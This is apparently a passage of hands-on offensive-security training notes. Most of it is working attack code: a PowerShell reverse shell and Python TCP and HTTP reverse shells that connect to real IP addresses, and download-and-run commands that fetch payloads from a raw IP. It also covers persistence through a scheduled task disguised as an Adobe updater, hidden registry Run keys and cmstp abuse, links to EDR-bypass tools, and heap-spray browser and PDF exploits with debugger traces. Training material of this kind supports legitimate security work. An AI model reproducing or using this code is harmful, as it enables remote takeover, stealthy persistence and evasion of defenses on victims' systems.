powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};  if ($process.ExitCode -ne $null) {$process.Close()};  exit;  };$address = '45.32.211.184';  $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;$process = New-Object System.Diagnostics.Process  ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;$process.StartInfo.RedirectStandardInput = 1  ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0  ;$process.Start()  ;$inputstream = $process.StandardInput  ;$outputstream = $process.StandardOutput  ;Start-Sleep 1  ;$encoding = new-object System.Text.AsciiEncoding  ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length)  ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;$pos = 0; $i = 1;  while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);  $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);  $inputstream.write($string);  start-sleep 1;  if ($process.ExitCode -ne $null) {ReverseShellClean}else {  $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){;  $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}};  $stream.Write($encoding.GetBytes($out),0,$out.length);  $out = $null;  $string = $null}} else {ReverseShellClean}};"
2731
 
2732
 
2733
----------------------------------------------------------------------
2734
2735
**** This shell has been VERY VERY VERY flaky for me - maybe you can figure out what is wrong  *****
2736
2737
2738
###############################
2739
# Reverse Shell in Python 2.7 #
2740
###############################
2741
 
2742
We'll create 2 python files. One for the server and one for the client.
2743
 
2744
- Below is the python code that is running on victim/client Windows machine:
2745
 
2746
---------------------------Paste This-----------------------------------
2747
 
2748
# Client
2749
 
2750
import socket # For Building TCP Connection
2751
import subprocess # To start the shell in the system
2752
 
2753
def connect():
2754
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2755
    s.connect(('45.32.211.184',8080))
2756
 
2757
    while True:                         #keep receiving commands
2758
        command = s.recv(1024)
2759
 
2760
        if 'terminate' in command:
2761
            s.close() #close the socket
2762
            break
2763
 
2764
        else:
2765
 
2766
            CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
2767
            s.send( CMD.stdout.read()  )  # send the result
2768
            s.send( CMD.stderr.read()  )  # incase you mistyped a command.
2769
            # we will send back the error
2770
 
2771
def main ():
2772
    connect()
2773
main()
2774
 
2775
 
2776
----------------------------------------------------------------------
2777
 
2778
- Below is the code that we should run on server unit, in our case InfosecAddicts Ubuntu machine ( Ubuntu IP: 45.32.211.184 )
2779
 
2780
---------------------------Paste This-----------------------------------
2781
 
2782
# Server
2783
 
2784
import socket # For Building TCP Connection
2785
 
2786
 
2787
def connect ():
2788
 
2789
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2790
    s.bind(("45.32.211.184", 8080))
2791
    s.listen(1)
2792
    conn, addr = s.accept()
2793
    print '[+] We got a connection from:  ', addr
2794
 
2795
 
2796
    while True:
2797
         command = raw_input("Shell> ")
2798
 
2799
         if 'terminate' in command:
2800
             conn.send('termminate')
2801
             conn.close()  # close the connection with host
2802
             break
2803
 
2804
         else:
2805
             conn.send(command)   #send command
2806
             print conn.recv(1024)
2807
 
2808
def main ():
2809
    connect()
2810
main()
2811
 
2812
----------------------------------------------------------------------
2813
 
2814
- First run server.py code from Ubuntu machine. From command line type:
2815
 
2816
---------------------------Type This-----------------------------------
2817
 
2818
python server.py
2819
 
2820
----------------------------------------------------------------------
2821
 
2822
- then check if 8080 port is open, and if we are listening on 8080:
2823
 
2824
---------------------------Type This-----------------------------------
2825
 
2826
netstat -antp | grep "8080"
2827
 
2828
----------------------------------------------------------------------
2829
 
2830
- Then on victim ( Windows ) unit run client.py code.
2831
 
2832
 
2833
- Connection will be established, and you will get a shell on Ubuntu:
2834
 
2835
---------------------------Type This-----------------------------------
2836
 
2837
python server.py
2838
[+] We got a connection from:   ('192.168.243.1', 56880)
2839
Shell> arp -a
2840
 
2841
Shell> ipconfig
2842
 
2843
Shell> dir
2844
----------------------------------------------------------------------
2845
 
2846
 
2847
##########################################
2848
# HTTP based reverse shell in Python 2.7 #
2849
##########################################
2850
 
2851
 
2852
- The easiest way to install python modules and keep them up-to-date is with a Python-based package manager called Pip
2853
- Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine
2854
 
2855
Then run python get-pip.py from command line. Once pip is installed you may use it to install packages.
2856
 
2857
- Install requests package:
2858
---------------------------Type This-----------------------------------
2859
 
2860
     python -m pip install requests
2861
 
2862
----------------------------------------------------------------------
2863
 
2864
- Copy and paste below code into client_http.py on your Windows machine:
2865
 
2866
- In my case server/ubuntu IP is 45.32.211.184. You need to change IP to your server address, in both codes (client_http.py, server_HTTP.py)
2867
 
2868
---------------------------Paste This-----------------------------------
2869
# Client
2870
 
2871
import requests
2872
import subprocess
2873
import time
2874
 
2875
 
2876
while True:
2877
    req = requests.get('http://45.32.211.184')
2878
    command = req.text
2879
 
2880
    if 'terminate' in command:
2881
        break
2882
 
2883
    else:
2884
        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
2885
        post_response = requests.post(url='http://45.32.211.184', data=CMD.stdout.read() )
2886
        post_response = requests.post(url='http://45.32.211.184', data=CMD.stderr.read() )
2887
 
2888
    time.sleep(3)
2889
 
2890
 
2891
 
2892
 
2893
----------------------------------------------------------------------
2894
 
2895
 
2896
 
2897
- Copy and paste below code into server_HTTP.py on your Ubuntu unit (server):
2898
 
2899
 
2900
---------------------------Paste This-----------------------------------
2901
 
2902
import BaseHTTPServer
2903
HOST_NAME = '45.32.211.184'
2904
PORT_NUMBER = 80
2905
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
2906
 
2907
    def do_GET(s):
2908
        command = raw_input("Shell> ")
2909
        s.send_response(200)
2910
        s.send_header("Content-type", "text/html")
2911
        s.end_headers()
2912
        s.wfile.write(command)
2913
 
2914
 
2915
    def do_POST(s):
2916
        s.send_response(200)
2917
        s.end_headers()
2918
        length = int(s.headers['Content-Length'])
2919
        postVar = s.rfile.read(length)
2920
        print postVar
2921
 
2922
if __name__ == '__main__':
2923
    server_class = BaseHTTPServer.HTTPServer
2924
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
2925
 
2926
    try:
2927
        httpd.serve_forever()                            
2928
    except KeyboardInterrupt:
2929
        print'[!] Server is terminated'
2930
        httpd.server_close()
2931
 
2932
----------------------------------------------------------------------
2933
 
2934
- run server_HTTP.py on Ubuntu with next command:
2935
 
2936
---------------------------Type This-----------------------------------
2937
 
2938
sudo python server_HTTP.py
2939
 
2940
----------------------------------------------------------------------
2941
 
2942
 
2943
- on Windows machine run client_http.py
2944
 
2945
- on Ubuntu you will see that connection is established:
2946
 
2947
---------------------------Type This-----------------------------------
2948
 
2949
sudo python server_HTTP.py
2950
Shell> dir
2951
-----------------------------------------------------------------------
2952
2953
2954
2955
2956
2957
2958
###############################
2959
# Device Guard Check & Bypass #
2960
###############################
2961
https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1
2962
2963
2964
######################
2965
# EDR Check & Bypass #
2966
######################
2967
https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1
2968
2969
2970
2971
2972
###############
2973
# Persistance #
2974
###############
2975
2976
2977
---- Scheduled Task Based Persistance ----
2978
1. Scheduled task based on most commonly occuring event ID
2979
https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1
2980
2981
2982
2983
To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
2984
2985
---------------------------Type This-----------------------------------
2986
mkdir c:\persistance
2987
2988
cd c:\persistance
2989
2990
(new-object System.Net.WebClient).DownloadFile("https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1", "c:\persistance\user_event_persistence.ps1")
2991
2992
.\user_event_persistence.ps1
2993
-------------------------------------------------------------------------
2994
2995
2996
2997
- Alternative method:
2998
--------------------
2999
In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"
3000
 
3001
- Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on target machine:
3002
- adapt  <UserId></UserId> to SID of current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
3003
- adapt  <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
3004
- this scheduled task triggers on a event, can be changed to regular calls (e.g. once an hour)
3005
 
3006
--------------------------------
3007
<?xml version="1.0" encoding="UTF-16"?>
3008
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
3009
  <RegistrationInfo>
3010
    <Author>Adobe Systems Incorporated</Author>
3011
    <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
3012
  </RegistrationInfo>
3013
  <Triggers>
3014
    <EventTrigger>
3015
      <Enabled>true</Enabled>
3016
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
3017
    </EventTrigger>
3018
  </Triggers>
3019
  <Principals>
3020
    <Principal id="Author">
3021
      <UserId>S-1-5-18</UserId>
3022
      <RunLevel>LeastPrivilege</RunLevel>
3023
    </Principal>
3024
  </Principals>
3025
  <Settings>
3026
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
3027
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
3028
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
3029
    <AllowHardTerminate>true</AllowHardTerminate>
3030
    <StartWhenAvailable>true</StartWhenAvailable>
3031
    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
3032
    <IdleSettings>
3033
      <StopOnIdleEnd>true</StopOnIdleEnd>
3034
      <RestartOnIdle>false</RestartOnIdle>
3035
    </IdleSettings>
3036
    <AllowStartOnDemand>true</AllowStartOnDemand>
3037
    <Enabled>true</Enabled>
3038
    <Hidden>true</Hidden>
3039
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
3040
    <WakeToRun>false</WakeToRun>
3041
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
3042
    <Priority>7</Priority>
3043
  </Settings>
3044
  <Actions Context="Author">
3045
    <Exec>
3046
      <Command>C:\Windows\System32\calc.exe</Command>
3047
    </Exec>
3048
  </Actions>
3049
</Task>
3050
 
3051
---------------------------
3052
 
3053
Now let's create the scheduled task
3054
---------------------------Type This-----------------------------------
3055
schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
3056
----------------------------------------------------------------------- 
3057
3058
3059
Sit back and wait for the task to trigger. By the way we got the correct XML file format by creating a scheduled tasked and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.
3060
3061
3062
3063
3064
---- Registry Based Persistance ---
3065
1. RunOnce key persistance trick
3066
Reference:
3067
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
3068
3069
3070
3071
1. upload your executable to system
3072
2. add registry entry (requires admin privileges):
3073
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"
3074
 
3075
Note:
3076
Beacon/Shell may prevent the user to login as he is hanging in the Beacon executable. Solution: spawn new beacon and exit initial beacon.
3077
3078
3079
3080
3081
3082
2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
3083
Let's try this:
3084
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
3085
3086
3087
2. Hide Reg
3088
Let's try this code out:
3089
https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741
3090
3091
Reference:
3092
https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
3093
3094
3095
3096
3097
Get the following two files
3098
---------------------------
3099
https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
3100
https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1
3101
3102
In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible for regedit and powershell.
3103
3104
To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
3105
3106
---------------------------Type This-----------------------------------
3107
mkdir c:\persistance
3108
3109
cd c:\persistance
3110
3111
(new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistance\PSReflect.ps1")
3112
3113
(new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistance\PSReflect-RegHide.ps1")
3114
3115
.\PSReflect-RegHide.ps1
3116
-------------------------------------------------------------------------
3117
3118
3119
3120
Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
3121
---------------------------Type This-----------------------------------
3122
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
3123
Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
3124
----------------------------------------------------------------------- 
3125
However, it will be visible e.g. for Sysinternals Autorun tool
3126
3127
3128
3129
3. VShadow
3130
Let's try this out:
3131
https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
3132
3133
3134
3135
1. Download vshadow.exe including in the WinSDK
3136
    Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
3137
    Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
3138
2. Upload the vshadow.exe to the target machine
3139
3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")
3140
3141
3142
---------------------------Type This-----------------------------------
3143
mkdir c:\persistance
3144
3145
cd c:\persistance
3146
3147
(new-object System.Net.WebClient).DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe", "c:\persistance\vshadow.exe")
3148
3149
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
3150
-----------------------------------------------------------------------
3151
3152
3153
4. INF-SCT
3154
Let's try this out:
3155
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
3156
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
3157
3158
3159
Technique 1: CMSTP
3160
------------------
3161
create "c:\persistance\cmstp.inf" with the following content:
3162
-----------------------------------
3163
;cmstp.exe cmstp.inf
3164
 
3165
[version]
3166
Signature=$chicago$
3167
AdvancedINF=2.5
3168
 
3169
[DefaultInstall_SingleUser]
3170
UnRegisterOCXs=UnRegisterOCXSection
3171
 
3172
[UnRegisterOCXSection]
3173
%11%\scrobj.dll,NI,c:\persistance\test.sct
3174
 
3175
[Strings]
3176
AppAct = "SOFTWARE\Microsoft\Connection Manager"
3177
ServiceName="Yay"
3178
ShortSvcName="Yay"
3179
----------------------------------------------------
3180
3181
3182
3183
get a sample sct payload (e.g. https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019) and store it in "c:\persistance\test.sct"
3184
3185
3186
---------------------------Type This-----------------------------------
3187
mkdir c:\persistance
3188
3189
cd c:\persistance
3190
3191
(new-object System.Net.WebClient).DownloadFile("https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019", "c:\persistance\test.sct")
3192
3193
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d "\"C:\Windows\System32\cmstp.exe\" /s C:\persistance\cmstp.inf"
3194
-----------------------------------------------------------------------
3195
3196
 
3197
reboot your machine
3198
your sct payload will be executed upon reboot. HOWEVER, as a Windows binary executes it, Sysinternals Autorun tool will not show it, unless you untick  "Options->Hide Windows Entries" option
3199
3200
3201
 
3202
5. GPScript.exe
3203
Let's try this out:
3204
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
3205
3206
3207
3208
---- Cobalt Strike Agressor Persistance Scripts ----
3209
https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
3210
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
3211
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna
3212
3213
3214
3215
3216
3217
3218
3219
3220
3221
--------------------------------------------------------------------------------------------------------------------------
3222
3223
3224
####################
3225
# Browser Exploits #
3226
####################
3227
3228
VLC smb:// exploit
3229
------------------
3230
3231
EXPLOIT VECTOR
3232
3233
smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
3234
3235
Exploit Scripts
3236
- ffvlc
3237
3238
ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
3239
3240
perl daemon.py vlc0.html
3241
3242
ON YOUR XPIE8 VM, START FIREFOX
3243
Browse to http://your_host_ip_address:8080/
3244
3245
vlc0.html
3246
---------
3247
<script>
3248
   var buf = "";
3249
   for(i = 0; i < 1250; i++)
3250
      buf += unescape("%41%41%41%41");
3251
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
3252
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
3253
</script>
3254
3255
vlc1.html
3256
---------
3257
<script>
3258
3259
   // shellcode created in heap memory
3260
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
3261
3262
   // 800K block of NOPS
3263
   var nop = unescape("%u9090%u09090");   // 4 NOPS
3264
   while(nop.length < 0xc0000) {
3265
      nop += nop;
3266
   }
3267
3268
   // spray the heap with NOP+shellcode
3269
   var memory = new Array();
3270
   for(i = 0; i < 50; i++) {
3271
      memory[i] = nop + shellcode;
3272
   }
3273
3274
   // build the exploit payload
3275
   var buf = "";
3276
   for(i = 0; i < 1250; i++)
3277
      buf += unescape("%41%41%41%41");
3278
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
3279
3280
   // trigger the exploit
3281
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
3282
</script>
3283
3284
perl daemon.py vlc1.html
3285
3286
Search for where our NOPS+shellcode lies in the heap
3287
3288
s 0 l fffffff 90 90 90 90 cc cc cc cc
3289
3290
0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
3291
03dffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3292
040ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3293
043ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3294
046ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3295
049ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3296
04cffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3297
04fffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3298
052ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3299
055ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3300
058ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3301
05bffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3302
05effffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3303
061ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3304
064ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3305
067ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3306
06affffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
3307
3308
Edit vlc2.html
3309
replace %41%41%41%41 with %07%07%07%07
3310
3311
(928.fd0): Break instruction exception - code 80000003 (first chance)
3312
eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
3313
eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0         nv up ei pl nz ac pe nc
3314
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
3315
07100000 cc              int     3
3316
0:019> u
3317
07100000 cc              int     3
3318
07100001 cc              int     3
3319
07100002 cc              int     3
3320
07100003 cc              int     3
3321
07100004 cc              int     3
3322
07100005 cc              int     3
3323
07100006 cc              int     3
3324
07100007 cc              int     3
3325
3326
Create vlc3.html (Copy vlc2.html to vlc3.html)
3327
----------------------------------------------
3328
Win32 Reverse Shell
3329
- no restricted characters
3330
- Encoder NONE
3331
- use the Javascript encoded payload generated by msfweb
3332
3333
USE AFTER FREE
3334
--------------
3335
3336
struct {
3337
   int a;
3338
   int b;
3339
   void (*add)();
3340
   char c[20];
3341
} s1, s2;
3342
3343
s1.a = 3;
3344
s1.b = 4;
3345
s1.add = my_add_func();
3346
strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");
3347
:
3348
:
3349
s2.add(x, y);
3350
:
3351
3352
Exploit scripts
3353
ie7-ms09002
3354
3355
perl daemon.py ie7imgtag0.html
3356
3357
First chance exceptions are reported before any exception handling.
3358
This exception may be expected and handled.
3359
eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
3360
eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0         nv up ei pl nz na po nc
3361
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
3362
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll - 
3363
mshtml!DllGetClassObject+0x4ec28:
3364
7e8999cb ff5104          call    dword ptr [ecx+4]    ds:0023:41420003=????????
3365
3366
WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:
3367
3368
call dword ptr [reg + N]
3369
3370
You control the reg value (completely or partially)
3371
3372
You have an exploitable vtable overwrite.
3373
3374
u eip-3 <--- check 3 instructions before the crash
3375
0:005> u eip-3
3376
mshtml!DllGetClassObject+0x4ec25:
3377
7e8999c8 8b08            mov     ecx,dword ptr [eax]
3378
7e8999ca 50              push    eax
3379
7e8999cb ff5104          call    dword ptr [ecx+4]
3380
3381
dd eax
3382
0:005> dd eax
3383
025445a0  4141ffff 00420042 00420042 00420042
3384
025445b0  00420042 00420042 00420042 00420042
3385
025445c0  00420042 00420042 00420042 00420042
3386
025445d0  00420042 00000042 e8b9ce43 ff080100
3387
3388
%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
3389
3390
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3391
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3392
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3393
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3394
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3395
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3396
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3397
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3398
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
3399
:
3400
:
3401
3402
EAX register ends up pointing to one of these src values
3403
%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
3404
3405
EAX points to ---> 4141ffff B B B B B B ...
3406
mov ecx, [eax]
3407
- what will ecx be? ECX = 4141ffff
3408
push eax
3409
call dword ptr [ecx+4]
3410
- EIP will jump to whatever is at memory location 4141ffff+4 = 41420003
3411
3412
ie7imgtag1.html
3413
---------------
3414
3415
var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");
3416
3417
EAX points to ---> 0606ffff B B B B B B ...
3418
mov ecx, [eax]
3419
- ecx = 0606ffff
3420
3421
call [ecx+4]
3422
- call [06070003]
3423
3424
Do we control the memory at 06070003?
3425
3426
dd 04040404 ........ 90 90 90 90 90 90 90
3427
dd 05050505 ........ 90 90 90 90 90 90 90
3428
dd 06060606 ........ 90 90 90 90 90 90 90
3429
3430
   06070003 --> 90909090
3431
3432
dd 07070707 ........ 90 90 90 90 90 90 90
3433
3434
EIP = 90909090 (whatever is stored at location 06070003)
3435
3436
3437
3438
3439
3440
3441
################
3442
# PDF EXPLOITS #
3443
################
3444
3445
mnp0.pdf
3446
3447
- Open up acrobat reader
3448
- WinDBG
3449
- F6 attach to AcroRd32.exe
3450
- g to Go
3451
3452
EIP = 41414141
3453
3454
Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
3455
3456
mnp1.pdf
3457
3458
All we are doing is changing EIP to 0c0c0c0c.
3459
There is no heap spray in this one.
3460
3461
This exception may be expected and handled.
3462
eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
3463
eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0         nv up ei pl nz na po nc
3464
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
3465
0c0c0c0c ??              ???
3466
3467
We know we get EIP control
3468
3469
mnp2.pdf
3470
3471
Put in the heap spray.
3472
3473
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
3474
3475
   var nops = unescape("%u9090%u9090");
3476
3477
   while(nops.length <= 32768)
3478
      nops += nops;
3479
   nops = nops.substring(0,32768 - shellcode.length);
3480
3481
   memory = new Array();
3482
3483
   for(i = 0; i < 1500; i++) {
3484
      memory[i] = nops + shellcode;
3485
   }
3486
3487
1500 NOP+shellcode blocks of 32K NOPs each
3488
3489
We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
3490
3491
We want to see what led to the crash.
3492
3493
EIP is invalid, so we can't disassemble around EIP
3494
3495
We need to trace the function that called us and crashed.
3496
- STACK TRACE
3497
- Dumps all the frames from the top of the stack.
3498
- show you the series of calls that led up to the crash.
3499
- we will analyze the topmost function on the frame.
3500
3501
WinDBG - stack trace - "k" command
3502
3503
0:000> k
3504
ChildEBP RetAddr  
3505
WARNING: Frame IP not in any known module. Following frames may be wrong.
3506
0013fb34 2d843117 0x90909090
3507
0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
3508
0013fbdc 23825d8c EScript!PlugInMain+0x25584
3509
0013fc74 238257e2 EScript!PlugInMain+0x249dc
3510
0013fca4 238543c5 EScript!PlugInMain+0x24432
3511
0013fd04 00a78de1 EScript!PlugInMain+0x53015
3512
0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
3513
0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
3514
0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
3515
0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
3516
0013fe24 00a323b4 USER32!DispatchMessageW+0xf
3517
0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
3518
0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
3519
0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
3520
0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
3521
0013ffc0 7c817067 AcroRd32+0x4004
